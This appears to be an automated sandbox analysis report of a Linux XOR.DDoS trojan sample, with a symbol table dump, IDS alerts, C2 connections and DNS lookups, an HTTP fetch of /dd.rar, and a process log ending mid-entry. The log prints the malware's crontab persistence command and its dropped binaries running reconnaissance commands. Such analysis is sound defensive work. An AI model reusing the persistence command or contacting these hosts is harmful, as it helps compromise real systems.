                                                            __lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                            __make_stacks_executable.symtab0x8051210257FUNC<unknown>DEFAULT3
                                                            __mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                            __malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                            __malloc_check_init.symtab0x8060000121FUNC<unknown>DEFAULT3
                                                            __malloc_get_state.symtab0x8064180428FUNC<unknown>DEFAULT3
                                                            __malloc_hook.symtab0x80cf9ec4OBJECT<unknown>DEFAULT21
                                                            __malloc_initialize_hook.symtab0x80d4b404OBJECT<unknown>DEFAULT22
                                                            __malloc_set_state.symtab0x8060dc0905FUNC<unknown>DEFAULT3
                                                            __malloc_stats.symtab0x8060840529FUNC<unknown>DEFAULT3
                                                            __malloc_trim.symtab0x8060bd0493FUNC<unknown>DEFAULT3
                                                            __malloc_usable_size.symtab0x805f01052FUNC<unknown>DEFAULT3
                                                            __mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                            __mbrlen.symtab0x808650055FUNC<unknown>DEFAULT3
                                                            __mbrtowc.symtab0x8086540407FUNC<unknown>DEFAULT3
                                                            __mbsnrtowcs.symtab0x8086ae0594FUNC<unknown>DEFAULT3
                                                            __memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                            __memalign_hook.symtab0x80cf9f44OBJECT<unknown>DEFAULT21
                                                            __memchr.symtab0x8066760411FUNC<unknown>DEFAULT3
                                                            __mempcpy.symtab0x8066a2068FUNC<unknown>DEFAULT3
                                                            __mkdir.symtab0x8068d6031FUNC<unknown>DEFAULT3
                                                            __mktime_internal.symtab0x809f3002437FUNC<unknown>DEFAULT3
                                                            __mmap.symtab0x8069da067FUNC<unknown>DEFAULT3
                                                            __mmap64.symtab0x8069df088FUNC<unknown>DEFAULT3
                                                            __mon_yday.symtab0x80c72c052OBJECT<unknown>DEFAULT7
                                                            __morecore.symtab0x80cf9e84OBJECT<unknown>DEFAULT21
                                                            __mpn_add_n.symtab0x80aa690144FUNC<unknown>DEFAULT3
                                                            __mpn_addmul_1.symtab0x80aa72060FUNC<unknown>DEFAULT3
                                                            __mpn_cmp.symtab0x8096b6092FUNC<unknown>DEFAULT3
                                                            __mpn_construct_double.symtab0x80aa7a086FUNC<unknown>DEFAULT3
                                                            __mpn_construct_float.symtab0x80aa76049FUNC<unknown>DEFAULT3
                                                            __mpn_construct_long_double.symtab0x80aa80071FUNC<unknown>DEFAULT3
                                                            __mpn_divrem.symtab0x8096bc01112FUNC<unknown>DEFAULT3
                                                            __mpn_extract_double.symtab0x80988b0244FUNC<unknown>DEFAULT3
                                                            __mpn_extract_long_double.symtab0x80989b0279FUNC<unknown>DEFAULT3
                                                            __mpn_impn_mul_n.symtab0x80976701989FUNC<unknown>DEFAULT3
                                                            __mpn_impn_mul_n_basecase.symtab0x8097570247FUNC<unknown>DEFAULT3
                                                            __mpn_impn_sqr_n.symtab0x8097e401829FUNC<unknown>DEFAULT3
                                                            __mpn_impn_sqr_n_basecase.symtab0x8097470250FUNC<unknown>DEFAULT3
                                                            __mpn_lshift.symtab0x809702087FUNC<unknown>DEFAULT3
                                                            __mpn_mul.symtab0x80970e0843FUNC<unknown>DEFAULT3
                                                            __mpn_mul_1.symtab0x809743057FUNC<unknown>DEFAULT3
                                                            __mpn_mul_n.symtab0x8098570620FUNC<unknown>DEFAULT3
                                                            __mpn_rshift.symtab0x809708087FUNC<unknown>DEFAULT3
                                                            __mpn_sub_n.symtab0x80987e0144FUNC<unknown>DEFAULT3
                                                            __mpn_submul_1.symtab0x809887060FUNC<unknown>DEFAULT3
                                                            __mprotect.symtab0x8069e7033FUNC<unknown>DEFAULT3
                                                            __mremap.symtab0x806add045FUNC<unknown>DEFAULT3
                                                            __munmap.symtab0x8069e5031FUNC<unknown>DEFAULT3
                                                            __nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                            __nanosleep_nocancel.symtab0x80677ba31FUNC<unknown>DEFAULT3
                                                            __new_exitfn.symtab0x8056000274FUNC<unknown>DEFAULT3
                                                            __new_exitfn_called.symtab0x80d62408OBJECT<unknown>DEFAULT22
                                                            __new_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                            __new_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                            __new_getrlimit.symtab0x806903054FUNC<unknown>DEFAULT3
                                                            __new_sem_init.symtab0x805332084FUNC<unknown>DEFAULT3
                                                            __new_sem_post.symtab0x805342078FUNC<unknown>DEFAULT3
                                                            __new_sem_wait.symtab0x8053380141FUNC<unknown>DEFAULT3
                                                            __nptl_create_event.symtab0x80547005FUNC<unknown>DEFAULT3
                                                            __nptl_deallocate_tsd.symtab0x8050980278FUNC<unknown>DEFAULT3
                                                            __nptl_death_event.symtab0x80547105FUNC<unknown>DEFAULT3
                                                            __nptl_initial_report_events.symtab0x80d20cc1OBJECT<unknown>DEFAULT22
                                                            __nptl_last_event.symtab0x80d20c04OBJECT<unknown>DEFAULT22
                                                            __nptl_nthreads.symtab0x80cf4f04OBJECT<unknown>DEFAULT21
                                                            __nptl_setxid.symtab0x8050e60941FUNC<unknown>DEFAULT3
                                                            __nptl_threads_events.symtab0x80d20b88OBJECT<unknown>DEFAULT22
                                                            __offtime.symtab0x809f010746FUNC<unknown>DEFAULT3
                                                            __open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                            __open_nocancel.symtab0x8053d8a33FUNC<unknown>DEFAULT3
                                                            __opendir.symtab0x80672a0220FUNC<unknown>DEFAULT3
                                                            __overflow.symtab0x805d81041FUNC<unknown>DEFAULT3
                                                            __parse_one_specmb.symtab0x80834801320FUNC<unknown>DEFAULT3
                                                            __pause_nocancel.symtab0x8053dea19FUNC<unknown>DEFAULT3
                                                            __posix_memalign.symtab0x80640d0111FUNC<unknown>DEFAULT3
                                                            __preinit_array_end.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                            __preinit_array_start.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                            __printf_arginfo_table.symtab0x80d63e04OBJECT<unknown>DEFAULT23
                                                            __printf_fp.symtab0x807f6209363FUNC<unknown>DEFAULT3
                                                            __printf_fphex.symtab0x8081b506104FUNC<unknown>DEFAULT3
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.2046.105.84.19041340532020381 07/27/22-09:48:16.981971TCP2020381ET TROJAN DDoS.XOR Checkin4134053192.168.2.2046.105.84.190
                                                            192.168.2.2054.36.15.9950774802021336 07/27/22-09:48:16.811975TCP2021336ET TROJAN DDoS.XOR Checkin via HTTP5077480192.168.2.2054.36.15.99
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 27, 2022 09:48:16.783644915 CEST5077480192.168.2.2054.36.15.99
                                                            Jul 27, 2022 09:48:16.785492897 CEST5833253192.168.2.2051.89.52.12
                                                            Jul 27, 2022 09:48:16.804222107 CEST535833251.89.52.12192.168.2.20
                                                            Jul 27, 2022 09:48:16.811377048 CEST805077454.36.15.99192.168.2.20
                                                            Jul 27, 2022 09:48:16.811506987 CEST5077480192.168.2.2054.36.15.99
                                                            Jul 27, 2022 09:48:16.811975002 CEST5077480192.168.2.2054.36.15.99
                                                            Jul 27, 2022 09:48:16.841236115 CEST805077454.36.15.99192.168.2.20
                                                            Jul 27, 2022 09:48:16.841557026 CEST5077480192.168.2.2054.36.15.99
                                                            Jul 27, 2022 09:48:16.861430883 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:16.869400978 CEST805077454.36.15.99192.168.2.20
                                                            Jul 27, 2022 09:48:16.889141083 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:16.889360905 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:16.890917063 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:16.981792927 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:16.981971025 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:17.009732962 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:17.009866953 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:20.105091095 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:20.105371952 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:30.139403105 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:30.139549971 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:40.187340975 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:40.187572956 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:50.219664097 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:50.219796896 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:48:50.962790012 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:48:50.963001966 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:49:01.002229929 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:49:01.002315998 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:49:11.035569906 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:49:11.035737991 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:49:21.066747904 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:49:21.066915989 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:49:26.046308041 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:49:26.046515942 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:49:30.113114119 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:49:30.113437891 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:49:40.146789074 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:49:40.146972895 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:49:50.179100037 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:49:50.179317951 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:50:00.227072001 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:50:00.227237940 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:50:01.009929895 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:50:01.010052919 CEST4134053192.168.2.2046.105.84.190
                                                            Jul 27, 2022 09:50:11.056329966 CEST534134046.105.84.190192.168.2.20
                                                            Jul 27, 2022 09:50:11.056503057 CEST4134053192.168.2.2046.105.84.190
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 27, 2022 09:48:16.764399052 CEST3987753192.168.2.208.8.8.8
                                                            Jul 27, 2022 09:48:16.766083002 CEST4443353192.168.2.208.8.8.8
                                                            Jul 27, 2022 09:48:16.783390045 CEST53398778.8.8.8192.168.2.20
                                                            Jul 27, 2022 09:48:16.785253048 CEST53444338.8.8.8192.168.2.20
                                                            Jul 27, 2022 09:48:16.804475069 CEST4316953192.168.2.208.8.8.8
                                                            Jul 27, 2022 09:48:16.823765993 CEST53431698.8.8.8192.168.2.20
                                                            Jul 27, 2022 09:48:16.824085951 CEST4311653192.168.2.208.8.4.4
                                                            Jul 27, 2022 09:48:16.841267109 CEST53431168.8.4.4192.168.2.20
                                                            Jul 27, 2022 09:48:16.841830969 CEST6075553192.168.2.208.8.8.8
                                                            Jul 27, 2022 09:48:16.861156940 CEST53607558.8.8.8192.168.2.20
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Jul 27, 2022 09:48:16.764399052 CEST192.168.2.208.8.8.80xad7bStandard query (0)www1.gggatat456.comA (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.766083002 CEST192.168.2.208.8.8.80x4e2bStandard query (0)p5.lpjulidny7.comA (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.804475069 CEST192.168.2.208.8.8.80x8c36Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.824085951 CEST192.168.2.208.8.4.40x1a73Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.841830969 CEST192.168.2.208.8.8.80xfa25Standard query (0)ppp.xxxatat456.comA (IP address)IN (0x0001)
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Jul 27, 2022 09:48:16.783390045 CEST8.8.8.8192.168.2.200xad7bNo error (0)www1.gggatat456.com54.36.15.99A (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.823765993 CEST8.8.8.8192.168.2.200x8c36Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.841267109 CEST8.8.4.4192.168.2.200x1a73Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.861156940 CEST8.8.8.8192.168.2.200xfa25No error (0)ppp.xxxatat456.com46.105.84.190A (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.861156940 CEST8.8.8.8192.168.2.200xfa25No error (0)ppp.xxxatat456.com54.36.15.98A (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.861156940 CEST8.8.8.8192.168.2.200xfa25No error (0)ppp.xxxatat456.com46.105.84.188A (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.861156940 CEST8.8.8.8192.168.2.200xfa25No error (0)ppp.xxxatat456.com79.137.1.134A (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.861156940 CEST8.8.8.8192.168.2.200xfa25No error (0)ppp.xxxatat456.com79.137.1.132A (IP address)IN (0x0001)
                                                            Jul 27, 2022 09:48:16.861156940 CEST8.8.8.8192.168.2.200xfa25No error (0)ppp.xxxatat456.com54.36.15.96A (IP address)IN (0x0001)
                                                            • www1.gggatat456.com
                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            0192.168.2.205077454.36.15.9980
                                                            TimestampkBytes transferredDirectionData
                                                            Jul 27, 2022 09:48:16.811975002 CEST1OUTGET /dd.rar HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: zh-cn
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                            Host: www1.gggatat456.com
                                                            Connection: Keep-Alive


                                                            System Behavior

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:/tmp/dkuidbsedp
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/usr/sbin/update-rc.d
                                                            Arguments:/usr/bin/perl /usr/sbin/update-rc.d dkuidbsedp defaults
                                                            File size:14437 bytes
                                                            MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/usr/sbin/update-rc.d
                                                            Arguments:n/a
                                                            File size:14437 bytes
                                                            MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/usr/lib/insserv/insserv
                                                            Arguments:/usr/lib/insserv/insserv dkuidbsedp
                                                            File size:56512 bytes
                                                            MD5 hash:34c11674a0b29347001640aeae7c94f1

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/usr/sbin/update-rc.d
                                                            Arguments:n/a
                                                            File size:14437 bytes
                                                            MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/bin/systemctl
                                                            Arguments:systemctl daemon-reload
                                                            File size:659848 bytes
                                                            MD5 hash:b08096235b8c90203e17721264b5ce40

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/bin/dash
                                                            Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                            File size:154072 bytes
                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/bin/dash
                                                            Arguments:n/a
                                                            File size:154072 bytes
                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                            Start time:09:48:15
                                                            Start date:27/07/2022
                                                            Path:/bin/sed
                                                            Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                            File size:73424 bytes
                                                            MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:/usr/bin/qvilroogsz "ls -la" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:/usr/bin/qvilroogsz "cat resolv.conf" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:/usr/bin/qvilroogsz "grep \"A\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:/usr/bin/qvilroogsz "netstat -antop" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:21
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:21
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:21
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:/usr/bin/qvilroogsz "netstat -antop" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:21
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvilroogsz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ada71b4b71b57b78680a7d8efd5c3382

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:/usr/bin/wyyhrifhaz bash 9446
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:/usr/bin/wyyhrifhaz "cd /etc" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:/usr/bin/wyyhrifhaz whoami 9446
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:/usr/bin/wyyhrifhaz id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:/usr/bin/wyyhrifhaz "netstat -an" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:26
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wyyhrifhaz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:54dae078a67e6b3e3da231442bf638ad

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:/usr/bin/wrfeamwlub id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:/usr/bin/wrfeamwlub ls 9446
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:/usr/bin/wrfeamwlub "echo \"find\"" 9446
                                                            File size:625889 bytes
